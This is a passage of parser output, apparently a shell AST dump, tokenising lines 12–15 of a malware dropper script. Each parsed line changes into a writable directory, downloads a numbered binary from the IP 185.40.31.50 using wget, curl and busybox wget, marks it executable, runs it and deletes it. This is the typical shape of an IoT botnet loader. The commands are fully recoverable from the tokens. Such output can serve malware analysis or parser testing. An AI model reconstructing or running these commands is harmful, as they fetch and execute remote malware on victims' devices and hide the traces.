    WordNode(lineno=12, pos=(1885, 1892), word='busybox'),
    WordNode(lineno=12, pos=(1893, 1897), word='wget'),
    WordNode(lineno=12, pos=(1898, 1920), word='http://185.40.31.50/10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1920, 1921)),
  CommandNode(lineno=12, pos=(1922, 1933), parts=[
    WordNode(lineno=12, pos=(1922, 1927), word='chmod'),
    WordNode(lineno=12, pos=(1928, 1930), word='+x'),
    WordNode(lineno=12, pos=(1931, 1933), word='10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1933, 1934)),
  CommandNode(lineno=12, pos=(1935, 1939), parts=[
    WordNode(lineno=12, pos=(1935, 1939), word='./10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1939, 1940)),
  CommandNode(lineno=12, pos=(1941, 1950), parts=[
    WordNode(lineno=12, pos=(1941, 1943), word='rm'),
    WordNode(lineno=12, pos=(1944, 1947), word='-rf'),
    WordNode(lineno=12, pos=(1948, 1950), word='10'),
  ]),
])
ListNode(lineno=13, pos=(1951, 2132), parts=[
  CommandNode(lineno=13, pos=(1951, 1958), parts=[
    WordNode(lineno=13, pos=(1951, 1953), word='cd'),
    WordNode(lineno=13, pos=(1954, 1958), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1959, 1961)),
  CommandNode(lineno=13, pos=(1962, 1973), parts=[
    WordNode(lineno=13, pos=(1962, 1964), word='cd'),
    WordNode(lineno=13, pos=(1965, 1973), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1974, 1976)),
  CommandNode(lineno=13, pos=(1977, 1984), parts=[
    WordNode(lineno=13, pos=(1977, 1979), word='cd'),
    WordNode(lineno=13, pos=(1980, 1984), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1985, 1987)),
  CommandNode(lineno=13, pos=(1988, 1996), parts=[
    WordNode(lineno=13, pos=(1988, 1990), word='cd'),
    WordNode(lineno=13, pos=(1991, 1996), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1997, 1999)),
  CommandNode(lineno=13, pos=(2000, 2004), parts=[
    WordNode(lineno=13, pos=(2000, 2002), word='cd'),
    WordNode(lineno=13, pos=(2003, 2004), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2004, 2005)),
  CommandNode(lineno=13, pos=(2006, 2033), parts=[
    WordNode(lineno=13, pos=(2006, 2010), word='wget'),
    WordNode(lineno=13, pos=(2011, 2033), word='http://185.40.31.50/11'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2033, 2034)),
  CommandNode(lineno=13, pos=(2035, 2065), parts=[
    WordNode(lineno=13, pos=(2035, 2039), word='curl'),
    WordNode(lineno=13, pos=(2040, 2042), word='-O'),
    WordNode(lineno=13, pos=(2043, 2065), word='http://185.40.31.50/11'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2065, 2066)),
  CommandNode(lineno=13, pos=(2067, 2102), parts=[
    WordNode(lineno=13, pos=(2067, 2074), word='busybox'),
    WordNode(lineno=13, pos=(2075, 2079), word='wget'),
    WordNode(lineno=13, pos=(2080, 2102), word='http://185.40.31.50/11'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2102, 2103)),
  CommandNode(lineno=13, pos=(2104, 2115), parts=[
    WordNode(lineno=13, pos=(2104, 2109), word='chmod'),
    WordNode(lineno=13, pos=(2110, 2112), word='+x'),
    WordNode(lineno=13, pos=(2113, 2115), word='11'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2115, 2116)),
  CommandNode(lineno=13, pos=(2117, 2121), parts=[
    WordNode(lineno=13, pos=(2117, 2121), word='./11'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2121, 2122)),
  CommandNode(lineno=13, pos=(2123, 2132), parts=[
    WordNode(lineno=13, pos=(2123, 2125), word='rm'),
    WordNode(lineno=13, pos=(2126, 2129), word='-rf'),
    WordNode(lineno=13, pos=(2130, 2132), word='11'),
  ]),
])
ListNode(lineno=14, pos=(2133, 2314), parts=[
  CommandNode(lineno=14, pos=(2133, 2140), parts=[
    WordNode(lineno=14, pos=(2133, 2135), word='cd'),
    WordNode(lineno=14, pos=(2136, 2140), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2141, 2143)),
  CommandNode(lineno=14, pos=(2144, 2155), parts=[
    WordNode(lineno=14, pos=(2144, 2146), word='cd'),
    WordNode(lineno=14, pos=(2147, 2155), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2156, 2158)),
  CommandNode(lineno=14, pos=(2159, 2166), parts=[
    WordNode(lineno=14, pos=(2159, 2161), word='cd'),
    WordNode(lineno=14, pos=(2162, 2166), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2167, 2169)),
  CommandNode(lineno=14, pos=(2170, 2178), parts=[
    WordNode(lineno=14, pos=(2170, 2172), word='cd'),
    WordNode(lineno=14, pos=(2173, 2178), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2179, 2181)),
  CommandNode(lineno=14, pos=(2182, 2186), parts=[
    WordNode(lineno=14, pos=(2182, 2184), word='cd'),
    WordNode(lineno=14, pos=(2185, 2186), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2186, 2187)),
  CommandNode(lineno=14, pos=(2188, 2215), parts=[
    WordNode(lineno=14, pos=(2188, 2192), word='wget'),
    WordNode(lineno=14, pos=(2193, 2215), word='http://185.40.31.50/12'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2215, 2216)),
  CommandNode(lineno=14, pos=(2217, 2247), parts=[
    WordNode(lineno=14, pos=(2217, 2221), word='curl'),
    WordNode(lineno=14, pos=(2222, 2224), word='-O'),
    WordNode(lineno=14, pos=(2225, 2247), word='http://185.40.31.50/12'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2247, 2248)),
  CommandNode(lineno=14, pos=(2249, 2284), parts=[
    WordNode(lineno=14, pos=(2249, 2256), word='busybox'),
    WordNode(lineno=14, pos=(2257, 2261), word='wget'),
    WordNode(lineno=14, pos=(2262, 2284), word='http://185.40.31.50/12'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2284, 2285)),
  CommandNode(lineno=14, pos=(2286, 2297), parts=[
    WordNode(lineno=14, pos=(2286, 2291), word='chmod'),
    WordNode(lineno=14, pos=(2292, 2294), word='+x'),
    WordNode(lineno=14, pos=(2295, 2297), word='12'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2297, 2298)),
  CommandNode(lineno=14, pos=(2299, 2303), parts=[
    WordNode(lineno=14, pos=(2299, 2303), word='./12'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2303, 2304)),
  CommandNode(lineno=14, pos=(2305, 2314), parts=[
    WordNode(lineno=14, pos=(2305, 2307), word='rm'),
    WordNode(lineno=14, pos=(2308, 2311), word='-rf'),
    WordNode(lineno=14, pos=(2312, 2314), word='12'),
  ]),
])
ListNode(lineno=15, pos=(2315, 2496), parts=[
  CommandNode(lineno=15, pos=(2315, 2322), parts=[
    WordNode(lineno=15, pos=(2315, 2317), word='cd'),
    WordNode(lineno=15, pos=(2318, 2322), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2323, 2325)),
  CommandNode(lineno=15, pos=(2326, 2337), parts=[
    WordNode(lineno=15, pos=(2326, 2328), word='cd'),
    WordNode(lineno=15, pos=(2329, 2337), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2338, 2340)),
  CommandNode(lineno=15, pos=(2341, 2348), parts=[
    WordNode(lineno=15, pos=(2341, 2343), word='cd'),
    WordNode(lineno=15, pos=(2344, 2348), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2349, 2351)),
  CommandNode(lineno=15, pos=(2352, 2360), parts=[
    WordNode(lineno=15, pos=(2352, 2354), word='cd'),
    WordNode(lineno=15, pos=(2355, 2360), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2361, 2363)),
  CommandNode(lineno=15, pos=(2364, 2368), parts=[
    WordNode(lineno=15, pos=(2364, 2366), word='cd'),
    WordNode(lineno=15, pos=(2367, 2368), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2368, 2369)),
  CommandNode(lineno=15, pos=(2370, 2397), parts=[
    WordNode(lineno=15, pos=(2370, 2374), word='wget'),
    WordNode(lineno=15, pos=(2375, 2397), word='http://185.40.31.50/13'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2397, 2398)),
  CommandNode(lineno=15, pos=(2399, 2429), parts=[
    WordNode(lineno=15, pos=(2399, 2403), word='curl'),
    WordNode(lineno=15, pos=(2404, 2406), word='-O'),
    WordNode(lineno=15, pos=(2407, 2429), word='http://185.40.31.50/13'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2429, 2430)),
  CommandNode(lineno=15, pos=(2431, 2466), parts=[
    WordNode(lineno=15, pos=(2431, 2438), word='busybox'),
    WordNode(lineno=15, pos=(2439, 2443), word='wget'),
    WordNode(lineno=15, pos=(2444, 2466), word='http://185.40.31.50/13'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2466, 2467)),
  CommandNode(lineno=15, pos=(2468, 2479), parts=[
    WordNode(lineno=15, pos=(2468, 2473), word='chmod'),
    WordNode(lineno=15, pos=(2474, 2476), word='+x'),
    WordNode(lineno=15, pos=(2477, 2479), word='13'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2479, 2480)),
  CommandNode(lineno=15, pos=(2481, 2485), parts=[
    WordNode(lineno=15, pos=(2481, 2485), word='./13'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2485, 2486)),
  CommandNode(lineno=15, pos=(2487, 2496), parts=[
    WordNode(lineno=15, pos=(2487, 2489), word='rm'),
    WordNode(lineno=15, pos=(2490, 2493), word='-rf'),
    WordNode(lineno=15, pos=(2494, 2496), word='13'),
  ]),
])
